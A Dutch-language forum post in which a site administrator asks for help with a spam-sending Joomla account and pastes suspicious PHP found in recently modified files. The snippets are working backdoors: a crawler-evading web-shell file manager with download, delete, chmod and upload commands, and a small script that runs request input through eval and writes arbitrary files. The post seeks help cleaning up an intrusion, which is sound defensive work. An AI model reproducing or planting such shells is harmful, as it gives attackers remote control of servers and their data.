Hallo allemaal,
Ik heb wat hulp nodig m.b.t. een account op één van de servers (DA/CentOs). De spam wordt de laatste paar dagen verstuurd en ik zie ook een aantal bestanden die ongeveer rond die datum (paar dagen geleden) zijn gewijzigd. Wachtwoord zijn inmiddels aangepast.
Meestal betreft het dan een iframe die ik verwijder uit de bestanden, maar deze keer zijn die er niet. Als ik dan op zoek ga naar verdachte code, dan zie ik wel dat een bestand bovenaan begint met een opening tag van PHP, dan een 'if(!empty...'-regel en daarna de opening tag van HTML met daaronder de rest van de pagina:
Ik herken dit soort code niet direct en snap ook niet wat het doet. Is iemand hier bekend mee? En, als dit legitieme code is, heeft iemand dan nog andere tips waarnaar ik kan kijken, specifiek in die bestanden die een paar dagen geleden zijn aangepast?Code:<?php if(!empty($_SERVER['HTTP_USER_AGENT'])) { $v2045f746 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "StackRambler"); if(preg_match('/' . implode('|', $v2045f746) . '/i', @$_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); if(@get_magic_quotes_gpc()) $_POST = n0182dfe8($_POST); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); define("DEFAULT_DIR_DEEP_BACK","3"); if(isset($_POST['p1'])) $_POST['p1'] = urldecode($_POST['p1']); if(isset($_POST['p3'])) $_POST['p3'] = urldecode($_POST['p3']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".@basename($_POST['p1'])); if (function_exists("mime_content_type")) { $v599dcce2 = @n85ced157($_POST['p1']); header("Content-Type: " . $v599dcce2); } else header("Content-Type: application/octet-stream"); $v0666f0ac = @fopen($_POST['p1'], "r"); if($v0666f0ac) { while(!@feof($v0666f0ac)) echo @fread($v0666f0ac, 1024); @fclose($v0666f0ac); } } exit; } elseif (@$_POST['p2']=='delete') { if (@is_dir($_POST['p1'])) @n46aa46af($_POST['p1']); else @unlink($_POST['p1']); } elseif (@$_POST['p2']=='chmod') { $v58f57b98 = 0; for($v865c0c0b=strlen($_POST['p1'])-1;$v865c0c0b>=0;--$v865c0c0b) $v58f57b98 += (int)$_POST['p3'][$v865c0c0b]*pow(8, (strlen($_POST['p3'])-$v865c0c0b-1)); if(!@chmod($_POST['p1'], $v58f57b98)) echo 'Can\'t set permissions!<br>'; } elseif (@$_POST['p2']=='mkdir') { if(!@mkdir($_POST['p1'])) echo 'Can\'t create new dir<br><script>document.mf.p3.value="";</script>'; } elseif (@$_POST['p2']=='uploadFile') { if(!@move_uploaded_file(@$_FILES['f']['tmp_name'], $_POST['p3'].@$_FILES['f']['name'])) echo 'Can\'t upload file!<br><script>document.mf.p3.value="";</script>'; } if (isset($_REQUEST['sf']) and $_REQUEST['sf']==0) $v2e0a881e = false; else $v2e0a881e = true; if (isset($_REQUEST['showro']) and $_REQUEST['showro']==0) $v8a40bf93 = false; else $v8a40bf93 = true; echo " <html> <style>.... ...... enz..
Het betreft een Joomla installatie, dus het kan prima zijn dat die code van Joomla is, maar omdat ik verder in de bestanden geen rare dingen kan vinden en alleen bovenstaande, dacht ik dat dit mogelijk een oorzaak kan zijn?
Bedankt alvast.
UPDATE:
In een ander bestand ook iets verdachts:
Code:<?php $qwucrp = "7bd065c708f3dcacae7a7b9409a243bc"; if(isset($_REQUEST['yydvoqju'])) { $vdgyrhoq = $_REQUEST['yydvoqju']; eval($vdgyrhoq); exit(); } if(isset($_REQUEST['rnlzrwiu'])) { $wqntplw = $_REQUEST['amuujp']; $pooxcfvu = $_REQUEST['rnlzrwiu']; $gukddfv = fopen($pooxcfvu, 'w'); $witl = fwrite($gukddfv, $wqntplw); fclose($gukddfv); echo $witl; exit(); } ?>

Likes:


Quote
.